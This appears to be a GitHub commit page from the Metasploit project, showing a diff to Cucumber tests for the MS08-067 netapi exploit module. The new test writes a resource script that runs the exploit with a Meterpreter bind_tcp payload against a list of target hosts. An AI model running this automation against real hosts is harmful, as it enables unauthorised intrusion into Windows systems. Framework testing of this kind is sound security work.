Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge branch 'jbarnett-r7-feature/MS-833/ms08-067-automation' into up…
…stream-master
- Loading branch information
Showing
6 changed files
with
38 additions
and
185 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,181 +1,27 @@ | ||
@wip | ||
@targets @db | ||
Feature: MS08-067 netapi | ||
|
||
Background: | ||
Given a directory named "home" | ||
And I cd to "home" | ||
And a mocked home directory | ||
Given I run `msfconsole` interactively | ||
And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp" | ||
|
||
Scenario: The MS08-067 Module should have the following options | ||
When I type "use exploit/windows/smb/ms08_067_netapi" | ||
And I type "show options" | ||
And I type "exit" | ||
Then the output should contain: | ||
Scenario: The MS08-067 should get a session with bind_tcp | ||
Given I ready the windows targets | ||
Given a file named "ms08-067-bind.rc" with: | ||
""" | ||
Module options (exploit/windows/smb/ms08_067_netapi): | ||
Name Current Setting Required Description | ||
---- --------------- -------- ----------- | ||
RHOST yes The target address | ||
RPORT 445 yes Set the SMB service port | ||
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) | ||
Exploit target: | ||
Id Name | ||
-- ---- | ||
0 Automatic Targeting | ||
<ruby> | ||
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') | ||
self.run_single('use exploit/windows/smb/ms08_067_netapi') | ||
self.run_single('set payload windows/meterpreter/bind_tcp') | ||
hosts.each do |host| | ||
self.run_single("set RHOST #{host['ipAddress']}") | ||
self.run_single('run -j') | ||
sleep 1 | ||
end | ||
self.run_single('sessions -K') | ||
</ruby> | ||
""" | ||
|
||
Scenario: The MS08-067 Module should have the following advanced options | ||
When I type "use exploit/windows/smb/ms08_067_netapi" | ||
And I type "show advanced" | ||
And I type "exit" | ||
Then the output should contain: | ||
""" | ||
Module advanced options: | ||
Name : CHOST | ||
Current Setting: | ||
Description : The local client address | ||
Name : CPORT | ||
Current Setting: | ||
Description : The local client port | ||
Name : ConnectTimeout | ||
Current Setting: 10 | ||
Description : Maximum number of seconds to establish a TCP connection | ||
Name : ContextInformationFile | ||
Current Setting: | ||
Description : The information file that contains context information | ||
Name : DCERPC::ReadTimeout | ||
Current Setting: 10 | ||
Description : The number of seconds to wait for DCERPC responses | ||
Name : DisablePayloadHandler | ||
Current Setting: false | ||
Description : Disable the handler code for the selected payload | ||
Name : EnableContextEncoding | ||
Current Setting: false | ||
Description : Use transient context when encoding payloads | ||
Name : NTLM::SendLM | ||
Current Setting: true | ||
Description : Always send the LANMAN response (except when NTLMv2_session is | ||
specified) | ||
Name : NTLM::SendNTLM | ||
Current Setting: true | ||
Description : Activate the 'Negotiate NTLM key' flag, indicating the use of | ||
NTLM responses | ||
Name : NTLM::SendSPN | ||
Current Setting: true | ||
Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow | ||
authentification on windows Seven/2008r2 when SPN is required | ||
Name : NTLM::UseLMKey | ||
Current Setting: false | ||
Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key | ||
when the LM response is sent | ||
Name : NTLM::UseNTLM2_session | ||
Current Setting: true | ||
Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a | ||
NTLMv2_session | ||
Name : NTLM::UseNTLMv2 | ||
Current Setting: true | ||
Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key | ||
is true | ||
Name : Proxies | ||
Current Setting: | ||
Description : A proxy chain of format type:host:port[,type:host:port][...] | ||
Name : SMB::ChunkSize | ||
Current Setting: 500 | ||
Description : The chunk size for SMB segments, bigger values will increase | ||
speed but break NT 4.0 and SMB signing | ||
Name : SMB::Native_LM | ||
Current Setting: Windows 2000 5.0 | ||
Description : The Native LM to send during authentication | ||
Name : SMB::Native_OS | ||
Current Setting: Windows 2000 2195 | ||
Description : The Native OS to send during authentication | ||
Name : SMB::VerifySignature | ||
Current Setting: false | ||
Description : Enforces client-side verification of server response signatures | ||
Name : SMBDirect | ||
Current Setting: true | ||
Description : The target port is a raw SMB service (not NetBIOS) | ||
Name : SMBDomain | ||
Current Setting: . | ||
Description : The Windows domain to use for authentication | ||
Name : SMBName | ||
Current Setting: *SMBSERVER | ||
Description : The NetBIOS hostname (required for port 139 connections) | ||
Name : SMBPass | ||
Current Setting: | ||
Description : The password for the specified username | ||
Name : SMBUser | ||
Current Setting: | ||
Description : The username to authenticate as | ||
Name : SSL | ||
Current Setting: false | ||
Description : Negotiate SSL for outgoing connections | ||
Name : SSLCipher | ||
Current Setting: | ||
Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" | ||
Name : SSLVerifyMode | ||
Current Setting: PEER | ||
Description : SSL verification method (Accepted: CLIENT_ONCE, | ||
FAIL_IF_NO_PEER_CERT, NONE, PEER) | ||
Name : SSLVersion | ||
Current Setting: SSL3 | ||
Description : Specify the version of SSL that should be used (Accepted: SSL2, | ||
SSL3, TLS1) | ||
Name : VERBOSE | ||
Current Setting: false | ||
Description : Enable detailed status messages | ||
Name : WORKSPACE | ||
Current Setting: | ||
Description : Specify the workspace for this module | ||
Name : WfsDelay | ||
Current Setting: 0 | ||
Description : Additional delay when waiting for a session | ||
""" | ||
|
||
@targets | ||
Scenario: Show RHOST/etc variable expansion from a config file | ||
When I type "use exploit/windows/smb/ms08_067_netapi" | ||
When RHOST is WINDOWS | ||
And I type "set PAYLOAD windows/meterpreter/bind_tcp" | ||
And I type "show options" | ||
And I type "run" | ||
And I type "exit" | ||
And I type "exit" | ||
Then the output should match /spider-wxp/ | ||
When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` | ||
Then the 'Mdm::Host' table contains the expected targets | ||
|
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,2 +1,7 @@ | ||
WINDOWS: spider-wxp.vuln.lax.rapid7.com | ||
LINUX: spider-ubuntu.vuln.lax.rapid7.com | ||
windows: | ||
- | ||
hostname: wxpsp0 | ||
ip: 127.0.0.100 | ||
- | ||
hostname: wxpsp2 | ||
ip: 127.0.0.101 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters